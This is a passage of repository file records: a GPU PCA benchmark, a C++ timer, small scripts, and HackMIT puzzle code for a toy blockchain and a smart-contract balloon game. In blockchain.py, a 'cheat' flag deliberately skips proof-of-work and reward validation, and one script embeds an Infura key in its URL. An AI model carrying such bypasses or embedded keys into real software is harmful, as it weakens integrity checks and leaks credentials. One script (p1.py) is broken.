"is_vendor": false,
"language": "Python",
"length_bytes": 1293,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 31,
"path": "/bench/skcuda/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import pycuda.autoinit\nimport pycuda.gpuarray as gpuarray\nimport numpy as np\nimport pandas as pd\nimport skcuda.linalg as linalg\nfrom datetime import datetime as dt\nfrom skcuda.linalg import PCA as cuPCA\n\ndataset_name = \"mnist_784.csv\"\ndata_dir = \"../../files/\"\nfile_name = data_dir + dataset_name\nX = pd.read_csv(file_name)\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\nX = np.array(X.values, dtype=\"float64\")\nsamples, features = X.shape\nn_components = features\nprint(\"SKCUDA Running PCA with {} features, {} samples, and {} n_components on dataset {}\".format(X.shape[1], X.shape[0], n_components, dataset_name))\ntime_init_pca = dt.now()\npca = cuPCA(n_components=n_components) # map the data to 4 dimensions\nX_gpu = gpuarray.GPUArray((samples,features), np.float64, order=\"F\") # note that order=\"F\" or a transpose is necessary. fit_transform requires row-major matrices, and column-major is the default\nX_gpu.set(X) # copy data to gpu\nT_gpu = pca.fit_transform(X_gpu) # calculate the principal components\nprint(linalg.dot(T_gpu[:,0], T_gpu[:,1]))\nprint(\"get_n_components()\", pca.get_n_components())\n\nprint(\"SKCUDA Total time {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))"
},
{
"alpha_fraction": 0.6792716979980469,
"alphanum_fraction": 0.6820728182792664,
"avg_line_length": 46.46666717529297,
"blob_id": "e46708d5dccc57b04faaa8cb06d26623e223195c",
"content_id": "a46c9396dba03b9b1c80310d4682dac444d4e92c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 714,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 15,
"path": "/src/timelogger.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#include \"include/timelogger.h\"\nTimeLogger::TimeLogger(int features, int samples, int n_components, std::string log_name) : \n features{features}, samples{samples}, n_components{n_components}, log_name{log_name} {}\nTimeLogger::timeLog* TimeLogger::start(std::string name) {\n timeLog *tl = new timeLog(this->features, this->samples, this->n_components, name, std::chrono::high_resolution_clock::now());\n logs.push_back(tl);\n return tl;\n}\nvoid TimeLogger::stop(timeLog* tl) {\n auto end = std::chrono::high_resolution_clock::now();\n tl->end_time = end;\n auto elapsed =\n std::chrono::duration_cast<std::chrono::nanoseconds>(end - tl->start_time);\n tl->time_ms = elapsed.count() * 1e-6;\n}\n\n\n"
},
{
"alpha_fraction": 0.6157684922218323,
"alphanum_fraction": 0.6257485151290894,
"avg_line_length": 30.34375,
"blob_id": "d2bbdea87ef4eef0d790a42d2f078f069a8f3214",
"content_id": "5bfde8a6a2b89cbc43df6c4875fc6b067a14d87c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 32,
"path": "/src/include/timelogger.h",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <chrono>\n#include <string>\n#include <vector>\n\n\n\nclass TimeLogger {\n public:\n struct timeLog {\n int features;\n int samples;\n int n_components;\n double time_ms;\n std::string name;\n std::chrono::high_resolution_clock::time_point start_time;\n std::chrono::high_resolution_clock::time_point end_time;\n timeLog(int features, int samples, int n_components, std::string name, std::chrono::high_resolution_clock::time_point start_time) : features{features},\n samples{samples}, n_components{n_components}, name{name}, start_time{start_time}{\n time_ms = -123456789.0; // To identify logs without stop()\n }\n };\n std::vector<timeLog*> logs;\n int features;\n int samples;\n int n_components;\n std::string log_name;\n TimeLogger(int features, int samples, int n_components, std::string log_name);\n timeLog* start(std::string name);\n void stop(timeLog* tl);\n};"
},
{
"alpha_fraction": 0.67405766248703,
"alphanum_fraction": 0.6796008944511414,
"avg_line_length": 28.032258987426758,
"blob_id": "7de02ec23e596ef50bf4e402556ccea4fb96bc7e",
"content_id": "3719275822d96e1d81ac74c122a291dd52878e62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 31,
"path": "/bench/sklearn/test_our_pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom sklearn.decomposition import PCA\nfrom time import perf_counter\nfrom helpers import *\n\n# set dataset name\ndata_file_name = \"face_data.csv\"\ndataset_name = \"Eigenfaces\"\ndata_dir = \"/home/gh/kernelpca/output/\"\nresult_path = \"/home/gh/kernelpca/bench/sklearn/images/\"\nU_file_name = data_dir + data_file_name\nS_file_name = data_dir + \"S_\" + data_file_name\nVT_file_name = data_dir + \"V_\" + data_file_name\n\n# read data\nU = pd.read_csv(U_file_name).values\nS = pd.read_csv(S_file_name).values\nVT = pd.read_csv(VT_file_name).values\n\nplot_components(components=VT\n , ncomponents=400\n , result_path=result_path\n , dataset_name=dataset_name\n , method=\"cuda_jacobi\")\n\n\n\n\n\n# recovered_images=[reconstruction(Y, C, M, h, w, i) for i in range(len(images))]\n# plot_portraits(recovered_images, celebrity_names, h, w, n_row=4, n_col=4)\n\n\n"
}
] | 20 |
codecherry12/myprograms
|
https://github.com/codecherry12/myprograms
|
c9dba282de17aacac74aeee517effc73a7c6bd27
|
58f92127aec8a0aa54a0ea492a0cb9502eed3215
|
60552aefb7ffea79977f5383ba899a4530ad03ef
|
refs/heads/master
| 2023-05-10T17:09:56.990157 | 2021-05-24T09:04:16 | 2021-05-24T09:04:16 | 370,282,585 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8139534592628479,
"alphanum_fraction": 0.8139534592628479,
"avg_line_length": 20.5,
"blob_id": "13ae92e14a06d64694b5b216cc2e8c01dbaae56e",
"content_id": "aafb919813fa894a6cd03c801f4211fd829b665c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 2,
"path": "/README.md",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "# myprograms\nthese are related to programs\n"
},
{
"alpha_fraction": 0.6326087117195129,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 31.928571701049805,
"blob_id": "2277219845e06ee7ddd7eb048921a85baf303b30",
"content_id": "1355abaf43585e73e27b5d029264cbad103a95b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 14,
"path": "/p1.py",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "Python 3.9.2 (tags/v3.9.2:1a79785, Feb 19 2021, 13:44:55) [MSC v.1928 64 bit (AMD64)] on win32\nType \"help\", \"copyright\", \"credits\" or \"license()\" for more information.\n>>> import PyPDF2\n\npdffileobj = open('EE_GATEPaper_2020.pdf','rb')\npdfreader = PyPDF2.pdfFilereader(pdffileobj)\n\nx = pdfreader.numPages\npageobj=pdfreader.getPage(x-1)\ntext=pageobj.extractText()\n\nfile1=open(r\"C:\\Users\\jeeii\\OneDrive\\Desktop\\P\\\\S.txt\",\"a\")\nfile1.writelines(text)\nfile1.close()"
},
{
"alpha_fraction": 0.7038626670837402,
"alphanum_fraction": 0.721030056476593,
"avg_line_length": 37.83333206176758,
"blob_id": "4531b7c798dbc9228f86521d152803a226b11227",
"content_id": "a68bbf85c29d6d37f1a864cfa29b0e980b7c72cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/p2.py",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "baggage_count=50\nno_of_baggage_picked=0\nwhile(baggage_count>0):\n no_of_baggage_picked = (int)(input (\"Number of baggage:\"))\n baggage_count = baggage_count - no_of_baggage_picked\nprint(\"No. of baggage remaining:\",baggage_count)\n"
}
] | 3 |
000alen/HackMIT
|
https://github.com/000alen/HackMIT
|
431798bdb6888ddfe6715ca170a784f65b6bad92
|
f918b91fc4972687dba38ed2a1361b95369f1573
|
97b5a0b80ec7a713c6c0d9dfa5ea33e6cef85c73
|
refs/heads/main
| 2023-07-27T08:50:04.410341 | 2021-08-25T07:08:21 | 2021-08-25T07:08:21 | 397,749,840 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5608407258987427,
"alphanum_fraction": 0.5621681213378906,
"avg_line_length": 32.8576774597168,
"blob_id": "6f61fbaf2b1a0c2dc82496db35dfc5669743b22a",
"content_id": "1cdb6bb62a8f6e9bbec511f844c5865e4392c7c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9040,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 267,
"path": "/puzzle4/modded_client/blockchain.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport datetime\nimport json\nfrom utils import trim_string\nfrom time import time\nfrom typing import Union, List\nimport constants as constants\nimport crypto as crypto\nimport jsonpickle\n\n\nclass Transaction:\n def __init__(self, id: str, sender: str, receiver: str, value: int, signature: str):\n self.id = id\n self.sender = sender\n self.receiver = receiver\n self.value = value\n self.signature = signature\n\n def __str__(self):\n return json.dumps({\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n 'signature': self.signature\n })\n\n def pretty_print(self, max_str_len=None, agents=None):\n sender = agents[self.sender] if agents and self.sender in agents else self.sender\n receiver = agents[self.receiver] if agents and self.receiver in agents else self.receiver\n\n if(not max_str_len):\n return f\"[id: {self.id}, {sender} -> {receiver}, {self.value} coins]\"\n return f\"[id: {trim_string(self.id, max_str_len//2)}, {trim_string(sender, max_str_len)} -> {trim_string(receiver, max_str_len)}, {self.value} coins]\"\n\n def comp(self):\n return json.dumps({\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n })\n\n # XXX\n def valid_signature(self):\n if self.sender == \"mined\":\n return True\n return crypto.verify(self.comp(), self.sender, self.signature)\n\n def to_json(self):\n return {\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n 'signature': self.signature\n }\n\n @staticmethod\n def from_json(jobj):\n return Transaction(\n id=str(jobj['id']),\n sender=jobj['sender'],\n receiver=jobj['receiver'],\n value=int(jobj['value']),\n signature=jobj['signature']\n )\n\n def sign(self, private):\n self.signature = crypto.sign(self.comp(), private)\n\n\nclass Block:\n def __init__(self, transactions: List[Transaction], previous_hash: str, miner=\"Anonymous\", nonce: int = 0, height: int = -1, timestamp=int(time())):\n self.timestamp = timestamp\n self.transactions = transactions\n self.previous_hash = previous_hash\n self.nonce = nonce\n self.height = height\n self.miner = miner\n\n self.parent: Union[Block, None] = None\n self.parent_hash: str = \"\"\n\n self.transaction_map = {txn.comp() for txn in self.transactions}\n\n def add_transaction(self, transaction: Transaction):\n self.transactions.append(transaction)\n self.transaction_map.add(transaction.comp())\n\n def get_hash_str(self):\n return f\"{self.timestamp}{[str(t) for t in self.transactions]}{self.previous_hash}{self.nonce}\".encode()\n\n def get_hash(self):\n sha = hashlib.sha256(self.get_hash_str())\n return sha.hexdigest()\n\n def set_parent(self, parent):\n self.parent = parent\n self.height = parent.height + 1\n\n def print_transactions(self):\n for tr in self.transactions:\n print(str(tr))\n\n def is_valid(self):\n return int(self.get_hash(), 16) < constants.DIFFICULTY\n\n def __str__(self):\n return json.dumps({\n 'timestamp': str(self.timestamp),\n 'transactions': [str(t) for t in self.transactions],\n 'previous_hash': str(self.previous_hash),\n 'nonce': self.nonce\n })\n\n def to_json(self):\n return {\n 'timestamp': self.timestamp,\n 'transactions': [t.to_json() for t in self.transactions],\n 'previous_hash': self.previous_hash,\n 'nonce': self.nonce\n }\n\n @staticmethod\n def from_json(jobj):\n return Block(\n timestamp=int(jobj['timestamp']),\n transactions=[\n Transaction.from_json(tj)\n for tj in jobj['transactions']\n ],\n 
previous_hash=str(jobj['previous_hash']),\n nonce=int(jobj['nonce'])\n )\n\n\ndef create_genesis_block():\n return Block([], \"\")\n\n\nclass Blockchain:\n def __init__(self):\n first_block = create_genesis_block()\n\n self.head = first_block\n self.blocks = {first_block.get_hash(): first_block}\n\n def traverse_blocks(self, head: Block, include_head=True):\n if include_head:\n yield head\n current = head.parent\n genisis_hash: str = create_genesis_block().get_hash()\n while current != None and current.get_hash() != genisis_hash:\n yield current\n current = current.parent\n\n def get_balance(self, address: str) -> int:\n total = 0\n\n for block in self.traverse_blocks(self.head, include_head=True):\n if not block:\n break\n\n for txn in block.transactions:\n if txn.sender == address and txn.receiver != address:\n total -= txn.value\n elif txn.sender != address and txn.receiver == address:\n total += txn.value\n return total\n\n def add_block(self, block: Block, cheat=False):\n \"\"\"Checks the entire chain for valid transactions\n and checks proof of work. Then adds block.\"\"\"\n\n block_hash = block.get_hash()\n\n # We already know this block.\n if block_hash in self.blocks:\n return False, \"Known block.\", {}\n\n # Parent doesn't exist :(\n if block.previous_hash not in self.blocks:\n return False, \"No valid parent.\", {}\n parent = self.blocks[block.previous_hash]\n block.set_parent(parent)\n\n # Check proof of work ;o\n if not cheat and not block.is_valid():\n return False, \"Invalid proof of work.\", {}\n\n # Verify transaction signatures.\n for transaction in block.transactions:\n if transaction.sender != \"mined\" and not transaction.valid_signature():\n return False, \"Transaction has invalid signature.\", {\"txn\": transaction}\n\n # Have any of these transactions been replays?\n for b in self.traverse_blocks(block, include_head=False):\n for c_txn in block.transactions:\n if c_txn.comp() in b.transaction_map:\n # We found the same transaction in a previous block.\n return False, \"Transaction replay detected.\", {\"txn\": c_txn}\n\n # For every transaction, does the sender own this money?\n reward_counted = False\n running_balance = {}\n for txn in block.transactions:\n if txn.value < 0:\n return False, \"Amount can't be negative.\", {\"txn\": txn}\n\n if txn.sender not in running_balance:\n running_balance[txn.sender] = 0\n\n if txn.sender == \"mined\":\n # This is the miner reward, let's make sure\n # it's correct. 
Technically, the miner can make\n # this payment to anyone she likes.\n if not cheat and txn.value > constants.REWARD:\n return False, \"Incorrect miner reward.\", {\"txn\": txn}\n\n # Let's also make sure the reward is only given\n # once and once only.\n if reward_counted:\n return False, \"Miner reward found twice in block.\", {\"txn\": txn}\n\n reward_counted = True\n running_balance[txn.sender] += constants.REWARD\n else:\n sender_coins = self.get_balance(\n txn.sender) + running_balance[txn.sender]\n print(\"sender balance: \", sender_coins)\n print(\"value: \", txn.value)\n if sender_coins < txn.value:\n # sender doesn't have enough coins,\n # block is invalid.\n return False, \"sender doesn't have enough coins.\", {\"txn\": txn}\n running_balance[txn.sender] -= txn.value\n\n # Looks like everything is set with this block.\n # Let's add this block and compute the longest\n # chain.\n\n self.blocks[block_hash] = block\n if block.height > self.head.height:\n self.head = block\n\n return True, \"Block added.\", {}\n\n def to_json(self):\n return jsonpickle.encode(self)\n\n # needs to flatten Block linked list to be serializable\n def _flatten(self):\n for block in self.blocks.values():\n if(block.parent):\n block.parent_hash = block.parent.get_hash()\n block.parent = None\n\n def _unflatten(self):\n for block in self.blocks.values():\n try:\n block.parent_hash\n except:\n block.parent_hash = \"\"\n if(block.parent_hash):\n block.parent = self.blocks[block.parent_hash] # type: ignore\n"
},
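A minimal, self-contained sketch of the proof-of-work idea the `Block.nonce` / `Block.is_valid` pair above implements: keep bumping a nonce until the SHA-256 digest of the block string, read as an integer, falls below a difficulty threshold. The `DIFFICULTY` value here is an arbitrary stand-in for illustration, not the puzzle's constant from `constants.py`.

```python
import hashlib
from itertools import count

# Stand-in threshold (roughly 1-in-16 hashes succeed); the real value lives in constants.py.
DIFFICULTY = 2 ** 252

def mine_demo(payload: str) -> int:
    """Return the first nonce whose SHA-256 digest, as an integer, is below DIFFICULTY."""
    for nonce in count():
        digest = hashlib.sha256(f"{payload}{nonce}".encode()).hexdigest()
        if int(digest, 16) < DIFFICULTY:
            return nonce

print(mine_demo("demo-block"))  # typically finds a nonce within a handful of tries at 2**252
```

Lowering `DIFFICULTY` makes valid nonces exponentially rarer, which is exactly why the miner files below report a hash rate every 300000 attempts.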
{
"alpha_fraction": 0.5374722480773926,
"alphanum_fraction": 0.556624710559845,
"avg_line_length": 29.617563247680664,
"blob_id": "b059812b4d585033129b80a7c418168e3293a9a8",
"content_id": "26e524a0b66dd33e1940f31a2314b7462cc4d788",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10808,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 353,
"path": "/puzzle5/main.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from web3 import Web3\nfrom solcx import compile_source\n\nimport string\nimport collections\n\nDIGITS = string.digits + string.ascii_letters\nCONTRACT_ADDRESS = \"0x98CD3B326E1248061d684Ae230F580b74195dD86\"\nPROVIDER_URL = \"https://ropsten.infura.io/v3/ad31d30c3c96492d9a7fc9324f4ddfde\"\nSOURCE = open(\"contract.sol\").read()\n\n\ndef find_monkey_position(B):\n \"\"\"\n Args:\n B (tuple): board configuration\n Output:\n int: column position of the monkey in B\n \"\"\"\n for i, x in enumerate(B[-1]):\n if x == \"x\":\n return i\n\n assert False\n\n\ndef num_balloons(B):\n \"\"\"\n Args:\n B (tuple): board configuration\n Output:\n int: number of balloons on the board\n \"\"\"\n ret = 0\n for r in B[:-1]:\n for c in r:\n if c != 0:\n ret += 1\n return ret\n\n\ndef make_move(B, cur_monkey_pos, cur_num_balloons, cur_num_lives, move):\n \"\"\"\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_balloons (int): current number of balloons on the board\n cur_num_lives (int): current number of lives remaining\n move (str): the proposed move (one of 'left', 'right', 'shoot')\n Output:\n (tuple, int, int, int): A tuple consisting of the board configuration after the move,\n the new monkey position, the new number of balloons on the map,\n and the new number of lives left\n (or None if invalid move or if the monkey gets hit)\n \"\"\"\n\n def check_lose(B, cur_monkey_pos):\n \"\"\"\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n Output:\n bool: True if a balloon will hit the monkey when the balloons shift down; False otherwise\n \"\"\"\n assert B[-1][cur_monkey_pos] == \"x\"\n if B[-2][cur_monkey_pos] != 0:\n return True\n return False\n\n def shift_down(B, cur_monkey_pos, cur_num_lives):\n \"\"\"\n Just performs the shift of all the balloons downwards.\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_lives (int): current number of lives in this configuration\n Output:\n (tuple, int): tuple consisting of the board configuration after balloons have all moved\n down by 1 and the new number of lives (or None if the monkey gets hit)\n \"\"\"\n\n # if check_lose(B, cur_monkey_pos):\n # return None\n\n new_board = []\n new_num_lives = cur_num_lives\n\n # construct the top row: if the balloon hits the ground, it respawns with +1 and we lose a life\n new_num_lives -= sum(1 for b in B[-2] if b > 0)\n top_row = tuple((b + 1 if 0 < b < 2 else b) for b in B[-2])\n # top_row = B[-2]\n new_board.append(top_row)\n\n # move all the middle rows down\n new_board.extend([r for r in B[:-2]])\n\n # add the ground row: nothing changes\n new_board.append(B[-1])\n\n return (tuple(new_board), new_num_lives)\n\n def partial_move(B, cur_monkey_pos, cur_num_balloons, move):\n \"\"\"\n Just performs the move, without the shift downwards\n Args:\n B (tuple): board configuration\n cur_monkey_pos (int): current column position of the monkey\n cur_num_balloons (int): current number of balloons on the board\n move (str): the proposed move (one of 'left', 'right', 'shoot')\n Output:\n (tuple, int, int): A tuple consisting of the board configuration after the move,\n the new monkey position, and the new number of balloons on the map\n (or None if invalid move)\n \"\"\"\n\n assert B[-1][cur_monkey_pos] == \"x\"\n R = len(B)\n C = len(B[0])\n\n new_board = [r for r in B[:-1]]\n new_bottom_row = [0 for _ in range(C)]\n new_monkey_pos = 
cur_monkey_pos\n new_num_balloons = cur_num_balloons\n\n if move == \"left\":\n if new_monkey_pos == 0:\n return None\n new_monkey_pos -= 1\n elif move == \"right\":\n if new_monkey_pos == C - 1:\n return None\n new_monkey_pos += 1\n elif move == \"shoot\":\n # simulate the dart\n for row in range(R - 2, -1, -1):\n if B[row][new_monkey_pos] != 0:\n new_row = list(B[row])\n new_row[new_monkey_pos] -= 1\n if new_row[new_monkey_pos] == 0:\n new_num_balloons -= 1\n new_board[row] = tuple(new_row)\n break\n else:\n assert False, \"invalid move: \" + move\n\n new_bottom_row[new_monkey_pos] = \"x\"\n new_board.append(tuple(new_bottom_row))\n return (tuple(new_board), new_monkey_pos, new_num_balloons)\n\n # make the move\n move_res = partial_move(B, cur_monkey_pos, cur_num_balloons, move)\n if move_res is None: # invalid move\n return None\n move_board, new_monkey_pos, new_num_balloons = move_res # unpack\n\n # shift all the balloons down\n shift_res = shift_down(move_board, new_monkey_pos, cur_num_lives)\n if shift_res is None: # check if a balloon hit the monkey\n return None\n new_board, new_num_lives = shift_res # unpack\n return (new_board, new_monkey_pos, new_num_balloons, new_num_lives)\n\n\ndef fast_solve(B_, init_lives):\n q = collections.deque([((B_, find_monkey_position(B_), num_balloons(B_), init_lives),0)])\n seen = {}\n while len(q) > 0:\n (B, pos, balloons, lives), moves = q.popleft()\n if B in seen:\n continue\n else:\n seen[B]=True\n if balloons == 0:\n return moves, lives\n valid = [make_move(B, pos, balloons, lives, 'left'), make_move(B, pos, balloons, lives, 'right'), make_move(B, pos, balloons, lives, 'shoot')]\n q.extend([(item,moves+1) for item in valid if item is not None and item[-1]>0])\n return None, None\n\n\ndef get_neighbors(config):\n possible_list = set()\n B, monkey_index, balloons, num_lives = config\n if num_lives == 0:\n return possible_list\n\n for move in ['left', 'right', 'shoot']:\n try_move = make_move(B, monkey_index, balloons, num_lives, move)\n if try_move and try_move[3] > 0:\n possible_list.add((try_move, move))\n\n return possible_list\n\n\ndef solve(B, init_lives):\n \"\"\"\n Args:\n B (tuple): the initial board configuration.\n init_lives (int): starting number of lives\n\n Output:\n int: the minimum number of moves to pop all the balloons (or None if it's not possible).\n \"\"\"\n\n if num_balloons(B) == 0:\n return 0\n\n previous = set()\n queue = [[((B, find_monkey_position(B), num_balloons(B), init_lives), None)]]\n pointer = 0\n\n while queue and pointer < len(queue):\n path = queue[pointer]\n node = path[-1]\n\n if node not in previous:\n neighbors = get_neighbors(node[0])\n for neighbor in neighbors:\n new_board, move = neighbor\n if neighbor not in previous:\n new_path = list(path)\n new_path.append(neighbor)\n queue.append(new_path)\n\n if new_board[2] == 0:\n print('lives left: ', new_board[3])\n tracked_moves = []\n tracked_states = []\n for state in new_path:\n if state[1]:\n tracked_moves.append(state[1])\n return tracked_moves, new_board[3]\n\n previous.add(node)\n pointer += 1\n return None\n\n\n# function pad(bin, size = 24) {\n# if(bin.length >= size)\n# return bin\n# return (\"0\".repeat(size-bin.length)) + bin\n# }\ndef pad(bin, size=24):\n if len(bin) >= size:\n return bin\n return (\"0\" * (size - len(bin))) + bin\n\n\ndef int2base(x, base):\n if x < 0:\n sign = -1\n elif x == 0:\n return DIGITS[0]\n else:\n sign = 1\n\n x *= sign\n digits = []\n\n while x:\n digits.append(DIGITS[x % base])\n x = x // base\n\n if sign < 0:\n 
digits.append('-')\n\n digits.reverse()\n\n return ''.join(digits)\n\n\n# The uint256 variable board stores the game board in a flattened row major order, with each board slot occupying 2 bits.\n# board = 0b0000...row5,row4,row3,row2, row1, row0\n# rowN = col11,...,col0 \n# function boardToInt(board){\n# const rows = []\n# for(let row of board){\n# row = row.map((x)=>parseInt(x,10))\n# row = row.map((x)=>x.toString(2))\n# row = row.map((x)=>pad(x,2))\n# row.reverse()\n# rows.push(row.join(''))\n# }\n# rows.reverse()\n# const bin = '0b' + rows.join('')\n\n# return web3.utils.toBN(BigInt(bin).toString(10))\n# }\ndef boardToInt(board):\n rows = []\n for row in board:\n # row = list(map(lambda x: int(x, 10), row))\n row = list(map(lambda x: int2base(x, 2), row))\n row = list(map(lambda x: pad(x, 2), row))\n row = list(reversed(row))\n rows.append(''.join(row))\n rows = reversed(rows)\n\n bin = '0b' + ''.join(rows)\n\n return bin\n\n\ndef intToBoard(board: str):\n # board = board[2:]\n board = [board[i : i + 24] for i in range(0, len(board), 24)]\n board = list(reversed(board))\n\n _board = []\n for row in board:\n row = [row[i : i + 2] for i in range(0, len(row), 2)]\n row = list(reversed(row))\n row = [int(x, 2) for x in row]\n\n _board.append(row)\n\n return _board\n\n\ncompiled_sol = compile_source(SOURCE)\ncontract_id, contract_interface = compiled_sol.popitem()\nabi = contract_interface[\"abi\"]\nw3 = Web3(Web3.HTTPProvider(PROVIDER_URL))\ncontract = w3.eth.contract(CONTRACT_ADDRESS, abi=abi)\n\nplayer_position = contract.functions.getPlayerPos().call()\n\n# board_int = contract.functions.getBoard().transact()\n# board_int = 882893299950477527990625818533691396\n\nboard_int = contract.functions.getBoard().call()\nboard_bin = int2base(board_int, 2)\nboard = intToBoard(board_bin)\n\nprint(player_position)\nprint(board)\n\nboard.append([\"x\" if i == player_position else 0 for i in range(len(board[0]))])\n\nboard = tuple(map(tuple, board))\n\nprint(fast_solve(board, 60))\n\n# wrapper = {\n# \"left\": contract.functions.left,\n# \"right\": contract.functions.right,\n# \"shoot\": contract.functions.shoot,\n# }\n\n# for step in steps:\n# wrapper[step]().call()\n\n# print(contract.functions.getBoard().call())\n"
},
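The `boardToInt`/`intToBoard` pair above packs each board slot into 2 bits of a uint256, reversing both row and column order. A minimal round-trip sketch of that packing, under the assumption of the 12-column (24 bits per row) width implied by `pad(..., 24)` in the solver; the sample board and function names here are made up for illustration, and cell values must fit in 2 bits (0-3).

```python
def pack_board(board):
    # Bottom row becomes the most significant 24 bits; within a row, the
    # last column is most significant (matching the reversed() calls above).
    bits = ""
    for row in reversed(board):
        for cell in reversed(row):
            bits += format(cell, "02b")  # 2 bits per slot
    return int(bits, 2)

def unpack_board(value, n_rows, n_cols=12):
    # Re-pad to the full width so leading zero rows survive the int round trip.
    bits = format(value, "0{}b".format(n_rows * n_cols * 2))
    rows = []
    for r in range(n_rows):
        chunk = bits[r * n_cols * 2:(r + 1) * n_cols * 2]
        row = [int(chunk[i:i + 2], 2) for i in range(0, len(chunk), 2)]
        rows.append(list(reversed(row)))
    return list(reversed(rows))

board = [[0] * 12 for _ in range(3)]
board[0][2] = 1   # a balloon with 1 hit point
board[1][5] = 2   # a balloon with 2 hit points
assert unpack_board(pack_board(board), n_rows=3) == board
```

The explicit zero-padding in `unpack_board` sidesteps the alignment issue that chunking a raw binary string from the left would otherwise have when its length is not a multiple of 24.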
{
"alpha_fraction": 0.6128205060958862,
"alphanum_fraction": 0.6133699417114258,
"avg_line_length": 27.2901554107666,
"blob_id": "631bed66082dfebe1ae4eef73481a9ced7a6940a",
"content_id": "aee3591ad4932b2d9d006e9624a3e55fdabd4746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5460,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 193,
"path": "/puzzle4/modded_client/exchange.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Main wallet code for HackCoin.\n\"\"\"\nfrom abc import get_cache_token\nimport os\nimport sys\nfrom typing import Optional, Union, List\n\nimport jsonpickle\nfrom blockchain import Blockchain, Transaction\nfrom crypto import generate_keys\nfrom utils import post_route, gen_uuid, get_route, trim_string, jsonpickle_decode\nfrom pyfiglet import Figlet\nfrom constants import PRINT_STR_LEN\nfrom tabulate import tabulate\n\nimport os\nimport json\n\n\ndef create_wallet(wallet_file=None):\n # Create a new address and dump it.\n private, public = generate_keys()\n\n if wallet_file is not None:\n\n wallet_contents = json.dumps({\n 'public': public,\n 'private': private\n })\n\n with open(wallet_file, 'w') as f:\n f.write(wallet_contents)\n print(\"Created new wallet in\", wallet_file)\n print(\"Your wallet address is:\", public)\n\n return public, private\n\n\ndef get_wallet(wallet_file):\n # Load existing.\n with open(wallet_file, 'r') as f:\n wallet_contents = f.read()\n wallet_obj = json.loads(wallet_contents)\n public = wallet_obj['public']\n private = wallet_obj['private']\n\n print(\"Loaded existing wallet from\", wallet_file)\n\n return public, private\n\n\ndef get_blockchain() -> Union[Blockchain, None]:\n resp = post_route('blockchain')\n if(resp):\n bc: Blockchain = jsonpickle_decode(resp[\"blockchain\"]) # type: ignore\n bc._unflatten()\n return bc\n\n\ndef get_transactions() -> List[Transaction]:\n resp = get_route(\"transaction\")\n if(resp and resp[\"success\"]):\n return resp[\"data\"]\n return []\n\n\ndef get_info():\n resp = get_route('info')\n if(not resp):\n print(\"failed to fetch info\")\n return resp[\"data\"] if resp else {\"cash\": 0, \"price\": \"?\", \"vendor\": None}\n\n\ndef get_balance(address: str, blockchain):\n if not blockchain:\n print(\"unable to get blockchain\")\n return 0\n return blockchain.get_balance(address)\n\n\ndef status(address: str, blockchain):\n info = get_info()\n print(\n f\"You have: {str(get_balance(address, blockchain))} hackcoins, and {info['cash']} dollars\")\n print(f\"Current market price of Hackcoin: ${info['price']}\")\n\n\ndef print_blockchain(bc: Blockchain):\n agents = get_market_agents()\n agents = {v: k for k, v in agents.items()}\n rows = []\n for block in bc.traverse_blocks(bc.head):\n rows.append([trim_string(getattr(block, \"miner\", \"anonymous\"), PRINT_STR_LEN), trim_string(block.get_hash(), PRINT_STR_LEN), \"\\n\".join(\n [t.pretty_print(PRINT_STR_LEN, agents) for t in block.transactions]), trim_string(block.previous_hash, PRINT_STR_LEN)])\n print(tabulate(rows[::-1], headers=[\"miner\",\n \"hash\", \"transactions\", \"prev_hash\"]))\n\n\ndef get_market_agents(public):\n 